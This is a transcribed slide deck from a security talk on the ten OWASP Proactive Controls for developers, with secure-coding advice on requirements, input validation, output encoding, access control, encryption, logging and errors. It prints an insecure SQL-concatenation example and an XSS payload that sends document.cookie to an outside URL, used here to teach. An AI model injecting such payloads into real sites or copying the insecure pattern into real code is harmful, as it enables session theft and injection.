infosecon-the ten things i wish every developer knew about ...€¦ · owasp proactive controls c1...
TRANSCRIPT
![Page 1: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/1.jpg)
The ten things I wish every developer knew about #AppSec: The OWASP Proactive Controls
Chris Romeo, CEO, Security JourneyCopyright © Security Journey
![Page 2: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/2.jpg)
• CEO / Co-Founder @ Security Journey
• 22 years in the security world, CISSP, CSSLP
• Co-host of the:
• Co-Lead of the OWASP Triangle Chapter
About Chris Romeo
@edgeroute
@AppSecPodcast
Copyright © Security Journey
![Page 3: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/3.jpg)
Agenda
• The state and size of the application security problem
• The ten things every developer must know• Questions
![Page 4: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/4.jpg)
State and size of the problem
( Apps) x ( Attackers) x ( Secure coding)
![Page 5: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/5.jpg)
The reality of software security in 2019
1 in 4
49%
85%
of apps are found to contain at least one highly exploitable cross site scripting
vulnerability.
vulnerabilities remain open over a year after
first discovery.
of apps have at least one vulnerability in
them.
Source: Veracode State of Software Security Volume 9
![Page 6: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/6.jpg)
The cost of a security issue
Source: IBM Cost of Data Breach Study, 2018
![Page 7: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/7.jpg)
Financial services is leading the pack
CAST analyzed 278 million lines of code from 1,388 applications and found 1.3 million CWE weaknesses in code developed under .NET and Java EE…. with .NET code generally having a greater density of weaknesses than Java EE -- in some cases with more than 35 CWE weaknesses per KLOC (1000 lines of code)
![Page 8: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/8.jpg)
A1:2017-InjectionA2:2017-Broken Authentication A3:2017-Sensitive Data ExposureA4:2017-XML External Entities (XXE)A5:2017-Broken Access ControlA6:2017-Security MisconfigurationA7:2017-Cross-Site Scripting (XSS)A8:2017-Insecure DeserializationA9:2017-Using Components with Known VulnerabilitiesA10:2017-Insufficient Logging & Monitoring
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
![Page 9: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/9.jpg)
OWASP Proactive Controls
C1 Define Security
Requirements
C2 Leverage Security
Frameworks and Libraries
C3 Secure Database Access
C4 Encode and Escape Data
C5 Validate All Inputs
C6 Implement Digital Identity
C7 Enforce Access Control
C8 Protect Data Everywhere
C9 Implement Security Logging and Monitoring
C10 Handle All Errors and Exceptions
![Page 10: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/10.jpg)
The mapping
OWASP Top 10 - 2017A1:2017-Injection
A2:2017-Broken Authentication
A3:2017-Sensitive Data Exposure
A4:2017-XML External Entities (XXE)
A5:2017-Broken Access Control
A6:2017-Security Misconfiguration
A7:2017-Cross-Site Scripting (XSS)
A8:2017-Insecure Deserialization
A9:2017-Using Components with Known Vulnerabilities
A10:2017-Insufficient Logging & Monitoring
C1 Define Security Requirements
C2 Leverage Security Frameworks and Libraries
C3 Secure Database Access
C4 Encode and Escape Data
C5 Validate All Inputs
C6 Implement Digital Identity
C7 Enforce Access Control
C8 Protect Data Everywhere
C9 Implement Security Logging and Monitoring
C10 Handle All Errors and Exceptions
![Page 11: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/11.jpg)
OWASP Proactive Controls is security information written for developers, by developers.
Why should you care?
![Page 12: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/12.jpg)
Define Security Requirements Shift security left
C1
![Page 13: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/13.jpg)
The usefulness of security requirements
Guidance / best practice
Metrics Procurement vehicle
![Page 14: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/14.jpg)
Requirements
• Application Security Verification Standard (ASVS)• 2.19, Verify there are no default passwords in use for the application
framework or any components used by the application (such as “admin/password”).
• 4.1, Verify that the principle of least privilege exists - users should only be able to access functions, data files, URLs, controllers, services, and other resources, for which they possess specific authorization. This implies protection against spoofing and elevation of privilege.
![Page 15: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/15.jpg)
User stories and misuse cases
User story
As a user, I can enter my username and password to gain access to the application.
As a user, I can enter a long password that has a maximum of 1023 characters.
User story Misuse story
As an attacker, I can enter in a default username and password to gain access.
![Page 16: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/16.jpg)
Four steps to successful use of security requirements
Discover/Select
Confirm correctness Implement
Document1 2
4 3
![Page 17: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/17.jpg)
Leverage security frameworks and libraries (and keep them updated)
Secure, reusable, and up to date components prevent
vulnerability to third-party issues.
C2
![Page 18: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/18.jpg)
Leverage security frameworks and libraries
Do not reinvent the wheel
Use native, secure framework
features
Stay up to date!
![Page 19: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/19.jpg)
Best practices for libraries and frameworks
■ Only use trusted, actively maintained, widely used sources.
■ Inventory all third-party libraries. ■ Proactively keep libraries and
components up to date.
■ Encapsulate libraries and expose only the required behaviour into your software.
![Page 20: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/20.jpg)
Secure Database Access
preventsSQL Injection
C3
![Page 21: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/21.jpg)
SQL InjectionINSECURE CODE
String newName = request.getParameter("newName");String id = request.getParameter("id");String query = " UPDATE EMPLOYEES SET NAME="+ newName + " WHERE ID ="+ id;Statement stmt = connection.createStatement();
//SQLPreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);//HQLQuery safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
SECURE CODE
![Page 22: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/22.jpg)
Secure database overview
Secure all the things
QUERIES AUTHENTICATION
COMMUNICATION CONFIGURATION
![Page 23: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/23.jpg)
Mitigations
• Perform proper input validation• Use a safe API• Contextually escape user data• Prepared statements with
parameterized queries
![Page 24: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/24.jpg)
Encode and escape all output prevents XSS
< <
C4
![Page 25: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/25.jpg)
Anatomy of an XSS attack
Attack 1 : cookie theft
Attack 2 : Web site defacement
<script>var badURL='https://securityjourney.com/somesite/data=' + document.cookie;var img = new Image();img.src = badURL;</script>
<script>document.body.innerHTML='<blink>GO BAD PEOPLE</blink>’;</script>
![Page 26: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/26.jpg)
Contextual output encoding
Basic HTML ContextHTML Content ContextHTML Attribute contextCSS contextsJavaScript Block contextJavaScript Variable contextEncode URL parameter valuesEncode REST URL parameters
![Page 27: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/27.jpg)
OWASP Java Encoder Project
HTML ContextsEncode#forHtmlEncode#forHtmlContentEncode#forHtmlAttributeEncode#forHtmlUnquotedAttribute
XML ContextsEncode#forXmlEncode#forXmlContentEncode#forXmlAttributeEncode#forXmlCommentEncode#forCDATA
Javascript ContextsEncode#forJavaScriptEncode#forJavaScriptAttributeEncode#forJavaScriptBlockEncode#forJavaScriptSource
CSS ContextsEncode#forCssStringEncode#forCssUrl
URI/URL ContextsEncode#forUriEncode#forUriComponent
![Page 28: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/28.jpg)
Validate all inputs preventsXSS and Injection
C5
![Page 29: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/29.jpg)
Syntactical validity -> the data is in the expected form.
Select a four-digit “account ID”.Application must check that the user data is EXACTLY four digits in length, and consists only of numbers .
Semantic validity -> the data is within an acceptable range.
With a date range, a start date must be before the end date.
Syntactical and semantic validity
![Page 30: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/30.jpg)
The good and the bad
Black listingWhite listing Server side Client side
![Page 31: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/31.jpg)
Libs and frameworks
■ Java– http://hibernate.org/validator/ – http://beanvalidation.org/
■ PHP’s filter functions– https://secure.php.net/manual/en/filter.examples.validation.php
■ Ruby on Rails– http://edgeapi.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html
■ JavaScript– https://github.com/cure53/DOMPurify
![Page 32: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/32.jpg)
Implement Digital Identity
prevents broken authentication
C6
![Page 33: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/33.jpg)
Authentication data
Memorized Secrets
One-TimePasswords
Biometrics
Recovery keys
Cryptographic key
![Page 34: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/34.jpg)
Factors of authentication
SOMETHING YOU KNOW
SOMETHING YOU HAVE
SOMETHING YOU ARE
Single
Two
Multi
![Page 35: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/35.jpg)
Enforce Access Control
prevents broken access control
C7
![Page 36: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/36.jpg)
Design principles for access control
1234567
Design thoroughly up front
Force all requests through access control checks
Deny by default
Follow principle of least privilege
Do not hardcode roles
Log all access control events
Eliminate development/debug backdoors in production code
![Page 37: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/37.jpg)
Access control caution
Caution• Good access control is hard to add to an
application late in the lifecycle. Work hard to get this right up front early on.
Verify• Turnkey security tools cannot verify access control
since tools are not aware of your applications policy. Be prepared to do security unit testing and manual review for access control verification.
![Page 38: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/38.jpg)
Protect Data Everywhere Encryption
C8
![Page 39: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/39.jpg)
Encryption Caution
Caution• Protecting sensitive data at rest and in transit is
painfully tough to build and maintain, especially for intranet infrastructure.
• Commit to long term plans to continually improve. • Consider enterprise class solutions.
Verify• Bring in heavy-weight resources to verify your
cryptographic implementations, especially at rest.
![Page 40: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/40.jpg)
TIP TIP TIP
Key lifecycle tips
Protect secret keys from
unauthorized access.
Store keys in a proper secrets
vault.
Use independent
keys when multiple keys are required.
1 2 3
![Page 41: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/41.jpg)
TIP TIP TIP
Key lifecycle tips
Build support for changing
algorithms and keys when needed.
Build application features to handle key rotation.
4
4 5
![Page 42: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/42.jpg)
Application secret management
• Don’t store secrets in code, config files or pass them through environment variables.
• Use tools like GitRob or TruffleHog to scan code repos for secrets.
• Keep keys and your other application-level secrets in a secrets vault like KeyWhiz, Hashicorp’s Vault project, or Amazon KMS to provide secure storage and access to application-level secrets at run-time.
![Page 43: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/43.jpg)
Implement Security Logging and Monitoring
Mandatory for conclusive forensic investigation
C9
![Page 44: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/44.jpg)
Tips for proper application security logging
Follow a common logging format.
Keep timestamps consistent through
time sync.
Always log the timestamp and
identifying information.
Do not log private or confidential data.
![Page 45: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/45.jpg)
Secure logging design
Encode and validate any dangerous characters before logging to prevent log injection or log forging attacks.
Protect log integrity – consider the permission of log files and log changes audit.
Forward logs from distributed systems to a central, secure logging service for centralized monitoring.
![Page 46: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/46.jpg)
Handle all errors and exceptions Stable applications.
C10
![Page 47: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/47.jpg)
TIP TIP TIP
Best practices for errors and exceptions
Manage exceptions in a
centralized manner.
Avoid duplicated try/catch blocks in
the code.
Ensure that all unexpected
behaviors are correctly handled
inside the application.
1 2 3
![Page 48: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/48.jpg)
TIP TIP TIP
Best practices
Do not leak critical data in error
messages, but provide verbose enough info to
explain the issue.
Ensure that exceptions have
enough information to
assist Q/A, forensics or
incident response teams.
Use the RESTful mechanism of standard HTTP response codes
for errors.
4 5 6
![Page 49: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/49.jpg)
Security concerns for exceptions
• Ensure the application fails securely under all circumstances, both expected and not expected
• Use a centralized error strategy to reduce points of failure and promote consistency
• Log when exceptions are thrown and include sufficient detail for security auditing
![Page 50: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/50.jpg)
Sources for additional study
The 5th annual report on global
open source software development
2019
Stateof the
SoftwareSupply
Chain
in partnership withpresented by
![Page 51: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/51.jpg)
Key Takeaways
1. Recognize the size of the problem.
2. Teach developers the proactive controls and embed them in your software development approach.
C1 Define Security Requirements
C2 Leverage Security Frameworks and Libraries
C3 Secure Database Access
C4 Encode and Escape Data
C5 Validate All Inputs
C6 Implement Digital Identity
C7 Enforce Access Control
C8 Protect Data Everywhere
C9 Implement Security Logging and Monitoring
C10 Handle All Errors and Exceptions
Copyright © 2019 Security Journey
![Page 52: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/52.jpg)
How to engage with Security Journey
1. Free trial of the Security Belt Program
https://app.securityjourney.com2. Contact Chris
[email protected]@edgeroute
3. https://www.securityjourney.com/hi5
Copyright © 2019 Security Journey
![Page 53: InfoSecon-The Ten Things I Wish Every Developer Knew About ...€¦ · OWASP Proactive Controls C1 Define Security Requirements C2 Leverage Security Frameworks and Libraries C3 Secure](https://reader036.vdocuments.us/reader036/viewer/2022071102/5fdbd3212895d76b6f36ace0/html5/thumbnails/53.jpg)
Resources
• OWASP Top 10 Project• https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
• OWASP Java Encoder• https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
• OWASP Proactive Controls• https://www.owasp.org/index.php/OWASP_Proactive_Controls